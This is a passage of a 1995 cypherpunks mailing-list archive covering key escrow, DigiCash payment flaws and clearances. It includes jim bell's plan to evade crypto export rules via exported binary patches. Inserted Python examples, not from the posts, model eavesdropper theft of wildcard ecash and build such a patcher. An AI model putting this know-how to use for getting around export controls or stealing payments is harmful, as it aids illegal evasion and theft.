Content-Type: text/plain


At the meeting, the NIST/NSA folks presented their criteria for
being an acceptable escrow agent. They had hardcopy, and
Geoff had slides. The slides didn't exactly match the hardcopy.

I have typed in the text from my hardcopy. It is on my clipper2
page (which is under construction at
<a href="http:/www.isse.gmu.edu/~pfarrell/nist/clipper2.html">)
url for the criteria for escrow agent entities is
<a href="http:/www.isse.gmu.edu/~pfarrell/nist/escagent.html">

I will _not_ post it (about 4 pages) to the list.
If you can't use the web, email me and I'll forward a copy.

I've got some notes on Geoff's presentation that I'll post later on.

Pat

Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 8 Dec 95 08:30:07 PST
To: Nicholas Philp <cypherpunks@toad.com
Subject: Re: (no subject)
Message-ID: <199512081631.IAA15841@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:25 PM 12/8/95, Nicholas Philp wrote:
>WE WANT SOME PUSSY PICTURES


Sorry:  You only get them if Netscape continues to play coy
on GAK

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 8 Dec 95 08:30:21 PST
To: Jeff Weinstein <cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512081631.IAA15969@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:14 AM 12/6/95 -0800, Jeff Weinstein wrote:
>  Our representative at the NIST meeting said 
> [GAK violates the rights of netscape's customers]
> It should be up on the web site in a few days when he gets
> back from DC.

Still not there.

When do you think it will come up?


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Thu, 7 Dec 95 05:36:58 PST
To: SBinkley@atitech.ca
Subject: Re: GAK
Message-ID: <9512071337.AA02622@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Scott Binkley writes:
>I heard a while back about being able to "split" up a PGP key.  What about
>splitting up the key into many parts, and giving them out to multiple
>INDEPENDENT agencies.  ie: One piece goes to the FBI, one to the NSA, one
>to some other committee, and so on.  That way, no government body could
>just tap your conversations without getting approval from others, and
>gaining the pieces of your key.
>
>just a thought

Why give them your key in the first place?  Personally, I wouldn't trust any 
government agency with even a fraction of my key - what makes you think they 
aren't *already* working together?  Then you have effectively given your key, 
and all of your private mail, to the government, no restrictions.
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Thu, 7 Dec 95 05:47:33 PST
To: Bill.Humphries@msn.fullfeed.com
Subject: Re: Responding to Exon -- technology is not enough
Message-ID: <9512071348.AA02951@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Bill Humphries writes:
>Instead of figuring out how to build a new treehouse that excludes Exon and
>Hyde, how about fighting the damned bill in the courts?

Possibly because a) it is already being fought, and b) court battles cost 
money which most folks don't have.  If people are unfamiliar with 
encryption, they should do a web search and find out what they can, then use 
it.  What you are saying (as far as encryption not being an answer because 
so few know how to use it) feels like "let's not use a gun to defend our home 
from intrusion because so few know how to handle them."  You don't just assume 
that because you don't know how that you give up.  You learn how.  That is how 
I found this list - because I did a little running around.

Munster
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 7 Dec 95 06:39:26 PST
To: REES@rmcs.cranfield.ac.uk
Subject: Plea for information
Message-ID: <199512071423.JAA14918@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Daniel,

   During a year in this penitentiary, here's five I heard the
   older cons mutter:

   1. "Applied Cryptography," Second edition just out, Bruce
   Schneier, Wiley, 1996. Flip through it and stare in
   disbelief and awe. Enjoy 2-5 and return, anxious.

   2. "The Codebreakers," David Kahn, Macmillan, 1967. Crypto-
   biblical tales of lying and cheating via momentarily secret
   tricks. Continued in 3.

   3. "Cyphernomicon," Tim May et al, 1006-Far Future. A wad
   of inspiring sci-non-fi of miscreating, eluding hard-bars
   and regaling in off-shore soft-bars. Also, C4.

   4. "Cypherpunks archives," All Wholesomes, <www.hks.net>,
   Infinite. The stingers honey pot for luring beekeepers into
   berzerk swarms. Wear 5 for protection.

   5. "PGP." Download it somewhere somewhat legally while you
   can, practice picking this sitar. And heave some brick-
   bucks at benefactor Phil for malefactor dues.














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Thu, 7 Dec 95 06:46:55 PST
To: Bill.Humphries@msn.fullfeed.com (Bill Humphries)
Subject: Re: Responding to Exon -- technology is not enough
In-Reply-To: <v01530501acebcc1c5522@[199.184.183.25]>
Message-ID: <9512071447.AA04735@outland>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Adam Hupp" <ahupp@primenet.com>
Date: Thu, 7 Dec 95 19:46:34 PST
To: cypherpunks@toad.com
Subject: Re: PGP
Message-ID: <199512080347.UAA22206@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


           Sorry...I was always taught that the user should not
       be mandated to finish the job of the programmer.  Please,
       do not take me wrong, PGP is a remarkable tool...but I
       was not aware I had to iron out the bugs.  That part is the
       easiest to do compared with the genius of the program...
       but I still should not have to do it.

This is not "ironing out bugs".  It is configuring the program to run 
on your version of Unix.  

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 7 Dec 95 10:03:05 PST
To: support@marktwain.com
Subject: Re: Still more on the Digicash protocol
Message-ID: <199512071803.KAA18623@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Mark Twain Ecash Support <support@marktwain.com>
> Let us contemplate in which type of situation the payee will send such a
> wildcard coin. To pay a shop via TCP? No. The payment request comes in with
> the shop ID. The resulting payment won't be done with a wildcard coin.
> 
> So when will the user pay with a wildcard coin? To make a payment to a party
> that is (pseudo-) anonymous to the payor. That is, if the payor sends the
> payment via anonymous remailer, in which case the messages should be
> encrypted anyway.

There might be some situations where it is useful to send a wildcard
coin even via a TCP connection.  For example, a pseudonymous server
might pop up at some internet address different from its real one, make
some transactions, and then go away.  Or someone might set up an
anonymous account at some public server (like c2.org) and conduct
business anonymously on an ongoing basis.  In either case the payee
would be anonymous to the payor even though they communicated via TCP.
The shop would have to send its payment request using "@" as the
shop_accID field (I have heard of an undocumented "-X <payee>" switch
in the Unix ecash program which allows the shop software to control
this field in the payment request).

We have also discussed the "pipe-net" which would allow anonymous TCP
connections.  This does not look like it can be as secure as the remailer
net but for occasional or short-term use it can provide considerable
privacy protection.

I am glad that DigiCash supports this type of cash which anyone can
deposit.  Actually, I am surprised and puzzled that it does, given
Chaum's apparent reluctance to endorse schemes to allow payee anonymity
(due to political problems, apparently).  It would be interesting to hear
how DigiCash envisions this feature being used, and whether they plan to
continue to allow it.  Since it is not well documented (if at all) it's
possible that they don't plan to keep it.

But if they do, I think it would be good to adapt the protocols so this
feature is usable over TCP connections.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Dec 95 07:06:01 PST
To: Mats Bergstrom <cypherpunks@toad.com
Subject: Re: 1)Age etc CA 2)Swedish Digicash
Message-ID: <2.2b8.32.19951207150646.006874cc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:56 PM 12/7/95 +0100, Mats Bergstrom wrote:

>Posten has licensed Digicash and plans to
>open a mint/bank (Posten already is closely connected to a bank)
>dealing in Swedish crowns. (This is not news but things seem to
>be moving right now.) Some (but slight) mention of laundering,
>of course. It's supposed to come about in 'the beginning of next
>year'. I wonder how exchanges crowns/dollars will be managed.

Is there an existing Post Office Bank in Sweden?  If so, can foreigners open
accounts?  The UK's postal bank (Girobank) has become more like a normal
bank and I think foreigners can open accounts.  (The US Postal Savings
System was closed in 1956 or so.)  I'd rather have a Swedish Digicash
account than one in the US.

DCF

"A bank is just a money switch.  Soon we'll all have money switches."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Twain Ecash Support <support@marktwain.com>
Date: Thu, 7 Dec 95 08:09:15 PST
To: daw@guaymas.CS.Berkeley.EDU (David A Wagner)
Subject: Re: Still more on the Digicash protocol
Message-ID: <199512071610.KAA16536@admin.starnet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:01 PM 12/6/95 -0500, you wrote:

>Hal has pointed out that payments & deposits with a wildcard in the
>payment_hdr should NOT be sent in the clear, since they can be stolen
>by any passive eavesdropper.

Let us contemplate in which type of situation the payee will send such a
wildcard coin. To pay a shop via TCP? No. The payment request comes in with
the shop ID. The resulting payment won't be done with a wildcard coin.

So when will the user pay with a wildcard coin? To make a payment to a party
that is (pseudo-) anonymous to the payor. That is, if the payor sends the
payment via anonymous remailer, in which case the messages should be
encrypted anyway.

[Why a remailed message should be encrypted is left as an exercise to the
reader.]

>Ian has pointed out the same problem with cancellations: the payer_code
>should NOT be sent in the clear, since any passive eavesdropper can
>grab this info and steal the corresponding payment.

As mentioned before, this will be fixed.


>Anyhow, the obvious solution is encryption.  Our new observation is
>that encrypting deposits & cancellations with the mint's public key
>is not enough to solve the problem.

[Argument in support of claim elided... I am not convinced.]

>While I'm ranting, let me also remind you of a problem Ian discovered
>earlier through reverse-engineering: the payment & deposit messages aren't
>encrypted,
[...]
>With traffic analysis, if payers use the default TCP connection, all
>this information about them can be compiled.  If I target a payer, I'll
>probably be able to record all his transactions (unless he's using
>remailers or pipenet).  If I sit outside a small business, I can compile
>a dossier on its buying habits.

One more time: this is only an issue if the payor is using a secure http
connection. Otherwise, you can gather all that information with or without
Ecash. The next release will use an already established SSL connection to
transmit this information, should the payor request it.

>Worse still, anonymity for the shop is worse with Digicash than with real
>cash.  If I pay you real cash on a secluded street, you're fairly anonymous.
>If I pay you Digicash over the Internet, any passive eavesdropper could be
>recording your identity and the whole transaction.  Blech.

This is raising an issue that has nothing to do with Ecash. The complaint is
in fact about the lack of a general link encryption on the Internet. I agree
that this is needed, but providing it really isn't Ecash's job. I am eagerly
anticipating the general use of IPSEC.

>  (Yes, this means shops will need to have certificates if you want
>  to avoid a man-in-the-middle attack.  So be it.  Most online shops
>  will be using SSL, and thus have a certificate anyhow.  You can safely
>  punt on the authentication between customer <-> shop if you're not
>  worried about active attacks.)

That's why the next version will use existing SSL, should the user so desire.

>* add a big warning to the documentation: users should not use wildcards
>  in payments (unless they know the dangers & are encrypting with e.g. PGP).

Will do.

>* continue specifying the protocol at a deeper level, like you promised
>  (and throw in source for security-critical modules too, eh? :-)

Writing all this down takes time. DigiCash may hire a tech writer soon. That
should improve communications between all parties.

--Lucky Green


--Mark Twain Bank Ecash Support
  Ecash. The secure Internet payment system that protects your privacy.
  <http://www.marktwain.com/ecash.html>
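
Added example, not DigiCash code and not written by any poster in this thread: a toy model of the mint-side deposit check, showing why a payment whose payee field is the "@" wildcard is bearer value that needs an encrypted channel, while a payment naming the shop can only be credited to that shop. The `ToyMint` class, the account names, the coin serial and the `may_send` guard are assumptions; only the "@" wildcard and the shop account ID field come from the discussion above and from Hal's earlier message.

```python
from dataclasses import dataclass

WILDCARD = "@"  # payee value the thread describes as depositable by anyone


@dataclass(frozen=True)
class Payment:
    serial: str   # stands in for the mint-signed coin
    amount: int
    payee: str    # shop account ID, or WILDCARD


class ToyMint:
    """Model assumption: the mint checks issuance, double deposit and payee."""

    def __init__(self, issued):
        self.valid = dict(issued)   # serial -> amount (signature check stand-in)
        self.spent = {}             # serial -> account that was credited
        self.balances = {}

    def deposit(self, payment, depositor):
        if self.valid.get(payment.serial) != payment.amount:
            return "rejected: not a coin issued by this mint"
        if payment.serial in self.spent:
            return "rejected: already deposited"
        if payment.payee != WILDCARD and payment.payee != depositor:
            return "rejected: payee mismatch"
        self.spent[payment.serial] = depositor
        self.balances[depositor] = self.balances.get(depositor, 0) + payment.amount
        return "accepted"


def race(payee_field):
    """A party who copied the cleartext payment reaches the mint first."""
    mint = ToyMint({"coin-0001": 5})                 # constructed sample coin
    payment = Payment("coin-0001", 5, payee_field)
    observer = mint.deposit(payment, "observer")     # copy taken off the wire
    intended = mint.deposit(payment, "shop-42")      # the payee the payer meant
    return observer, intended, mint.balances


def may_send(payment, channel_encrypted):
    """Client-side guard matching the documentation warning requested in the
    thread: refuse to put a wildcard payment on a cleartext channel.
    (Transaction privacy for named payments is a separate concern.)"""
    return channel_encrypted or payment.payee != WILDCARD


if __name__ == "__main__":
    print(race(WILDCARD))    # first depositor wins, whoever it is
    print(race("shop-42"))   # the copy is useless to anyone but shop-42
    print(may_send(Payment("coin-0001", 5, WILDCARD), channel_encrypted=False))
```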





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jps@monad.semcor.com (Jack P. Starrantino)
Date: Thu, 7 Dec 95 07:16:05 PST
To: cypherpunks@toad.com
Subject: Re: latest librand source now av
Message-ID: <9512071516.AA01104@monad.semcor.com>
MIME-Version: 1.0
Content-Type: text/plain


an116512@anon.penet.fi writes

> ... [various profanities omitted] ...

The bad is getting worse. I don't know how these services work. Can I
killfile the account, or do I need to ax the host?

Many thanks.

jps
-- 
Jack P. Starrantino     (215) 674-0200 (voice)
SEMCOR, Inc.            (215) 443-0474 (fax)
65 West Street Road     jps@semcor.com
Suite C-100
Warminster, PA 18974



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dreschs@mpd.tandem.com (Sten Drescher)
Date: Thu, 7 Dec 95 08:23:10 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
In-Reply-To: <m0tNR0t-00093sC@pacifier.com>
Message-ID: <5568fsj0wg.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


jimbell@pacifier.com (jim bell) said:

jb> You miss the point!  There will be no "international effort"!  Here
jb> are the steps:

jb> 1.  Write a program limited to keysize, carefully constructed to
jb> isolate those portions of the program which define key size,
jb> GAKedness, etc.

jb> 2.  Get it export approved.  Export it.

jb> THEN

jb> 3.  Announce that a "US-only" version of the same program is being
jb> released, and include the minimal component which replaces the
jb> limited software.  Release it, only in the US of course!

	As has been pointed out, this would prolly doom getting export
approval for version 2.0.  However, let's keep the developer/publisher
out of the loop.  How about someone developing a 'binary diff', using
the functionality of nm to find subroutine entry points, and then doing
the binary diff from those starting points?  Presumably, for most of the
program the diff would mostly be changed entry points, with the bulk of
diff being the crypto module.  Then the bdiff gets exported, and
bpatch-ed into the export binary.  Of course, this wouldn't work if they
strip the binary, but who is going to force them to do that?

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dreschs@mpd.tandem.com (Sten Drescher)
Date: Thu, 7 Dec 95 08:56:08 PST
To: cypherpunks@toad.com
Subject: Re: Secret Clearance (was: re: NIST GAK export meeting, sv)
In-Reply-To: <199512062336.PAA14064@ix6.ix.netcom.com>
Message-ID: <55zqd4hku3.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> said:

BS> Few, if any, other than companies already in the military business;
BS> secret clearances are _expensive_, usually take a long time to get,
BS> and the military only gives them to people who need them.

	Strange, the military processed a SECRET clearance on me even
before I signed on the dotted line.  Now a TS, that's expensive, but
they didn't have much on me other than my SSAN and, I think, my prints
to process the SECRET, so they couldn't have done much more than run me
through the FBI criminal database.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Thu, 7 Dec 95 09:05:37 PST
To: cypherpunks@toad.com
Subject: RSA '96 Conference
Message-ID: <30c71f4f43fe002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


This might be a little early, but will there be a cypherpunks
get together at RSA '96? Perhaps a Coed Naked Cypherpunks Key
Signing or something?

-- 
Kevin L. Prigge        |"A computer lets you make more mistakes faster 
UofM Central Computing | than any invention in human history--with the 
email: klp@umn.edu     | possible exceptions of handguns and tequila."
01001001110101100110001| - Mitch Ratcliffe



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 7 Dec 95 12:03:32 PST
To: dreschs@mpd.tandem.com (Sten Drescher)
Subject: Re: Solution for US/Foreign Software?
Message-ID: <m0tNm1C-00092KC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 AM 12/7/95 -0600, you wrote:
>jimbell@pacifier.com (jim bell) said:
>
>jb> 1.  Write a program limited to keysize, carefully constructed to
>jb> isolate those portions of the program which define key size,
>jb> GAKedness, etc.
>
>jb> 2.  Get it export approved.  Export it.
>
>jb> THEN
>
>jb> 3.  Announce that a "US-only" version of the same program is being
>jb> released, and include the minimal component which replaces the
>jb> limited software.  Release it, only in the US of course!
>
>	As has been pointed out, this would prolly doom getting export
>approval for version 2.0.  However, let's keep the developer/publisher
>out of the loop.  How about someone developing a 'binary diff', using
>the functionality of nm to find subroutine entry points, and then doing
>the binary diff from those starting points?  Presumably, for most of the
>program the diff would mostly be changed entry points, with the bulk of
>diff being the crypto module.  Then the bdiff gets exported, and
>bpatch-ed into the export binary.  Of course, this wouldn't work if they
>strip the binary, but who is going to force them to do that?

Okay, that was basically what I was suggesting.  A full binary difference
file wouldn't even need to have any information about the internals of the
program anyway.

Basically, what needs to be achieved is a way to allow the software
manufacturer to sell an approved product outside the country, but allow the
foreign buyer to (easily) convert it into a GOOD encryption product.  Once
that works, laws against the export of encryption are meaningless.  In fact,
the legally-exported program obviously wouldn't even need to HAVE encryption
in it at all, so it won't fall under ITAR classification, and thus won't
need any kind of export license. 
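
[Added example, not part of either post and not code from any project named
in the thread: a sketch of the symbol-aligned binary diff described above,
with base and target hash checks so the patch refuses to apply to the wrong
binary. The images, the nm-style listings and all function names are
constructed; it assumes a flat image where symbol address equals file offset.]

```python
import hashlib

def sha256(data):
    return hashlib.sha256(data).hexdigest()

def parse_nm(listing):
    """Parse `nm -S` style lines '<addr> <size> <type> <name>' (hex fields).

    Assumption: symbol address == file offset (flat image). Real object
    formats need the section headers to map addresses to file offsets.
    """
    syms = []
    for line in listing.strip().splitlines():
        parts = line.split()
        if len(parts) == 4 and parts[2] in ("T", "t"):  # sized code symbols only
            syms.append((int(parts[0], 16), int(parts[1], 16), parts[3]))
    return sorted(syms)

def make_patch(old, old_nm, new, new_nm):
    """Walk the new image function by function; reuse identical old bodies."""
    old_pos = {name: (off, size) for off, size, name in parse_nm(old_nm)}
    ops, cursor = [], 0
    for off, size, name in parse_nm(new_nm):
        if off < cursor or off + size > len(new):
            raise ValueError("symbol %s overlaps or runs past the image" % name)
        if off > cursor:                      # bytes not covered by any symbol
            ops.append(("data", new[cursor:off]))
        body = new[off:off + size]
        o, s = old_pos.get(name, (0, 0))
        if s == size and old[o:o + s] == body:
            ops.append(("copy", o, s))        # only the entry point moved
        else:
            # Changed or new function. In real code a function that merely
            # calls a moved function also lands here, because the embedded
            # call target changes with the new entry point.
            ops.append(("data", body))
        cursor = off + size
    if cursor < len(new):
        ops.append(("data", new[cursor:]))
    return {"base": sha256(old), "target": sha256(new), "ops": ops}

def apply_patch(old, patch):
    """Rebuild the new image; refuse a wrong base or a bad result."""
    if sha256(old) != patch["base"]:
        raise ValueError("patch was built against a different base image")
    out = bytearray()
    for op in patch["ops"]:
        if op[0] == "copy":
            out += old[op[1]:op[1] + op[2]]
        else:
            out += op[1]
    if sha256(bytes(out)) != patch["target"]:
        raise ValueError("patched image does not match the recorded target")
    return bytes(out)

def literal_bytes(patch):
    """Bytes the patch has to carry itself (everything else comes from old)."""
    return sum(len(op[1]) for op in patch["ops"] if op[0] == "data")

def build_image(funcs):
    """Constructed test helper: concatenate bodies, emit an nm-style listing."""
    image, lines = b"", []
    for name, body in funcs:
        lines.append("%016x %016x T %s" % (len(image), len(body), name))
        image += body
    return image, "\n".join(lines)

# Constructed sample: three "functions"; only the middle one differs, which
# shifts the entry point of the function that follows it.
MAIN, IO = bytes(range(16)), b"\xc3" * 12
OLD_IMAGE, OLD_NM = build_image([("main", MAIN), ("crypt", b"\xa0" * 8), ("io", IO)])
NEW_IMAGE, NEW_NM = build_image([("main", MAIN), ("crypt", b"\xb1" * 24), ("io", IO)])

if __name__ == "__main__":
    p = make_patch(OLD_IMAGE, OLD_NM, NEW_IMAGE, NEW_NM)
    print([op[:1] + op[1:] if op[0] == "copy" else ("data", len(op[1])) for op in p["ops"]])
    print("literal bytes carried:", literal_bytes(p), "of", len(NEW_IMAGE))
    print("round trip ok:", apply_patch(OLD_IMAGE, p) == NEW_IMAGE)
```

[If the binary is stripped, parse_nm() returns nothing and the whole image
falls through as one literal "data" run, which is the limitation the post
mentions.]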





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: REES@rmcs.cranfield.ac.uk
Date: Thu, 7 Dec 95 03:33:15 PST
To: cypherpunks@toad.com
Subject: Plea for information
Message-ID: <951207113222.88b6@rmcs.cranfield.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


I would be interested in learning more about the politics and mathematics of
cryptography, but my site does not have access to a newsreader.  As I am new to
the Net, I am not aware of any acceptable way around this, which will allow me
to read and contribute to the cypherpunk and related newsgroups - please can
you help me out on this matter.  Also, I would like to know how best to
understand cryptography - I have a textbook on the basic mathematical concepts
underlying the techniques but it is too advanced for my current knowledge in
this field (A-level - ie. end of high school), please can you suggest a good
starting place for me.

Thanks in advance for your assistance,

Daniel Rees




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 7 Dec 95 09:53:12 PST
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: News on Congressional Debate on Exon
In-Reply-To: <01HYHWSWQVWG9S3RQJ@mbcl.rutgers.edu>
Message-ID: <Pine.ULT.3.91.951207115227.11932B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 6 Dec 1995, E. ALLEN SMITH wrote:

>    The agreement makes it all but certain that if legislation overhauling
>    the nation's telecommunications laws is enacted, it will contain some
>    of the most sweeping anti-smut provisions ever imposed on computer
                               ^^^^
>    communications.
>    
>    The plan is part of negotiations on a larger telecommunications bill
>    and settles differences among House members who were deeply divided
>    over how to best limit children's exposure to smut carried on computer
                                                   ^^^^
>    services, including the global network, Internet.

(rest of biased language deleted to keep my lunch down.  Suffice it to 
say that "smut" is such a loaded term that it's a wonder anyone can see 
anything within the framework of the constitution.)

>    Indecent speech, unlike obscenity, is protected under the First
>    Amendment. Though the House plan doesn't yet specifically define
>    "indecent," the standard legal and regulatory definition says it is
>    material that describes in terms patently offensive, as measured by
>    contemporary community standard, sexual or excretory activities or
>    organ.

That's obscenity folks.  That _is_ legally defined. (Miller, wasn't it?)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMMcOhDokqlyVGmCFAQGRAAP+MUoTEogvkbpsjRhJKpfPkBgieXyY5atn
piD13JM/2Ev3cW3tj+HrxSUayb1n3jfXuu5wyVAC8ZFtjEHSKENALGt1ND7D8vQu
ZjdIohX+aK6BzT924GUlB0hGmoqPDUD7loz45/rYvtlJUt7HKnZHdniDgVsadvuG
T2mtD05dg9c=
=w5Q9
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Thu, 7 Dec 95 10:17:20 PST
To: Bill.Humphries@msn.fullfeed.com
Subject: Re: Responding to Exon -- technology is not enough
Message-ID: <01HYIYF5CAAK9S3S5K@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"Bill.Humphries@msn.fullfeed.com"  6-DEC-1995 20:16:17.29

>Anyone wish to comment on the prospect of a double blind server, set
>outside U.S. borders, that can act as an interface to the rest of the
>world, perhaps encrypting or stego'ing the data transferred between it and
>the user? Basically, an anonymous remailer that acts as a cross between
>an NNTP, POP3, and SMTP servers.
------------------------------
	Encrypting data between the server and the user would probably not work
very well, due to the lack of cryptographic knowledge among most users (_I_
don't know how to set up PGP for a VAX (even if I had the room to store it
in my quota), and I have some interests in this stuff). However, something
where someone did a standard http link in, typed in a destination, and got put
there in a way that would look like the person was coming in from the server
should work. For best bookmarking results, the added link should probably be
inside the link that it looked to the user like they were on. For instance,

http://www.anonserve.net/http/www.hotsex.com/

should bookmark properly, and be interpretable by the server as being a
command to do a http link to that web location. I am admittedly not that
familiar with the root mechanism of the WWW, but I believe this would work.
	-Allen 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher Kleiman" <ckleiman@fdic.gov>
Date: Thu, 7 Dec 95 09:53:23 PST
To: cypherpunks@toad.com
Subject: re: Re: Secret Clearance (was: re: NIST GAK export         meeting, sv)
Message-ID: <JSI8+hdmlka@DACS_DC_16.FDIC.GOV>
MIME-Version: 1.0
Content-Type: text/plain




Bill Stewart <stewarts@ix.netcom.com> said:

>>BS> secret clearances are _expensive_, usually take a long time to get,
>>BS> and the military only gives them to people who need them.

>	Strange, the military processed a SECRET clearance on me even
>before I signed on the dotted line.  Now a TS, that's expensive, but
>they didn't have much on me other than my SSAN and, I think, my prints
>to process the SECRET, so they couldn't have done much more than run me
>through the FBI criminal database.

>#include <disclaimer.h>				/* Sten Drescher 

Actually, you filled out some paperwork when you signed up that was sent 
forward; it wasn't much more than a check against all of the govt's "evil type 
people" databases.  However, I understand that it depends on what Level of 
background check as well.  A limited background investigation involves 
filling out a long form saying that you've been a good boy/girl; it goes up 
from there.  "Civilians" are different from military as well; after all, in 
one they own you, in the other, you can actually go home at night.;-)

**
Nothing I say can be held as the viewpoint of my employer; I'm a short-timer 
anyway, so I really don't care what they think!

Chris
**




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 7 Dec 95 10:06:33 PST
To: <cypherpunks@toad.com
Subject: Re: Secret Clearance (was: re: NIST GAK export meeting, sv)
Message-ID: <9512071806.AA08617@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Bill Stewart <stewarts@ix.netcom.com> said:
 
> BS> Few, if any, other than companies already in the military business;
> BS> secret clearances are _expensive_, usually take a long time to get,
> BS> and the military only gives them to people who need them.
 
> 	Strange, the military processed a SECRET clearance on me even
> before I signed on the dotted line.  Now a TS, that's expensive, but
> they didn't have much on me other than my SSAN and, I think, my prints
> to process the SECRET, so they couldn't have done much more than run me
> through the FBI criminal database.
> 
     It varies. My SECRET took almost a year and a personal interview
before it was granted. Living 13 years abroad in 5 countries, visiting
the eastern bloc, and having relatives over there, made DISA a bit
nervous. 

    Clearances tend to be easiest for nth generation midwesterners
who are just out of school, have never been anywhere, and have no
known relatives abroad.

    I never went for a TS - I figured it would be too much trouble, and
